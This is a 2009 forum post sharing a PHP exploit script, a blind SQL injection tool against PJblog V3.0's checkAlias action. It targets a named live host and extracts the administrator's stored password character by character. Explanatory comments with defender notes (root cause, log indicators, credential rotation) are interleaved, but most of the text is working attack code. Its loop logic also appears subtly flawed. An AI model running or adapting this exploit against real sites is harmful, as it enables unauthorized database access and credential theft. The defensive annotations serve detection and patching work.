
标题: PJblog V3.0 0day Vbs版漏洞利用工具

作者: 柔肠寸断    时间: 2009-4-28 12:51     标题: PJblog V3.0 0day Vbs版漏洞利用工具

  1. <?php
  2. /*
  3. PJblog V3.0 0day exp

      What this listing is: a boolean-based blind SQL injection client. It sends
      GET requests to /action.asp?action=checkAlias and places a sub-select on
      blog_member.mem_password inside the cname parameter (see the $newurl line).
      Each request compares the character code at one position of the stored
      value with a number; the script takes the answer as "true" when the string
      held in $var_key appears in the response body.

      Notes for defenders:
      - Root cause (inferred from the payload shape; the ASP source is not shown
        on this page): cname appears to be concatenated into a double-quoted SQL
        string. The durable fix is a parameterized query for the alias lookup
        plus an allow-list on alias characters; apply the vendor's fix for
        checkAlias where one is available.
      - Log indicators: bursts of requests to action.asp?action=checkAlias whose
        cname contains a double quote followed by URL-encoded "select top 1",
        "asc(mid(mem_password", "From blog_member" and "mem_name=", with only two
        integers changing between consecutive requests. PHP's http stream
        wrapper sends no User-Agent header unless one is configured, so these
        requests often arrive without one.
      - If such requests are found in logs, treat the named administrator's
        stored credential as exposed and rotate it.
  4. */

  5. $url="http://www.pjhome.net";    //injection address (base URL the requests are sent to)
  6. $var_name="puterjam";    //administrator account name used in the mem_name filter
      // Marker string searched for in each response to decide true/false.
  7. $var_key="check_right";

      // Character position to start from: $_SESSION["LenI"] when set, otherwise 1.
  8. if ($_SESSION["LenI"]){
  9. $LenI=$_SESSION["LenI"];
  10. }else{
  11. $LenI=1;
  12. }
      // Outer loop: character positions $i up to 40.
  13. for($i=$LenI;$i<=40;$i++){
      // First character code to try: $_SESSION["LenDo"] when set, otherwise 31.
  14. if($_SESSION["LenDo"]){
  15. $StaAsc=$_SESSION["LenDo"];
  16. }else{
  17. $StaAsc=31;
  18. }
      // Progress line written to the page.
  19. echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
      // Inner loop: candidate character codes $j up to 127.
  20. for($j=$StaAsc;$j<=127;$j++){
      // The cname value carries a double quote, an AND-ed sub-select returning
      // asc(mid(mem_password, $i, 1)) for the row where mem_name = $var_name,
      // a ">" (%3e) comparison with $j, and a trailing quoted "1"="1 term.
      // $var_name is concatenated into the URL as-is.
  21. $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
      // Plain GET through PHP's stream wrapper; the response body comes back as a string.
  22. $var_pagelen=file_get_contents($newurl);
      // strpos() yields an integer offset or false; the loose "== true" below
      // treats any non-zero offset as "marker present".
  23. $var_newpagelen=strpos($var_pagelen,$var_key);
  24. if($var_newpagelen == true){
      // Marker seen: append chr($j) to the accumulated string, clear LenDo,
      // store the next position in LenI, emit the reload script, leave the inner loop.
  25. $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
  26. unset($_SESSION["LenDo"]);
  27. $_SESSION["LenI"]=$i+1;
  28. doReload();
  29. break;
  30. }
      // After the candidate at $StaAsc+10 (the 11th of this pass), emit the
      // reload script and leave the inner loop.
  31. if($j == $StaAsc+10){
  32. doReload();
  33. break;
  34. }
  35. }
  36. }
      // Print the accumulated string once LenI equals 40 and LenDo is not set.
  37. if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }

      // doReload(): writes an inline <script> that reloads the current page
      // after 1000 ms. Takes no arguments and returns nothing.
  38. function doReload(){
  39. ?>
  40. <script  language="javascript">
  41. <!--
  42. window.setTimeout('location.reload()',1000);
  43. //-->
  44. </script>
  45. <?php
  46. }
  47. ?>




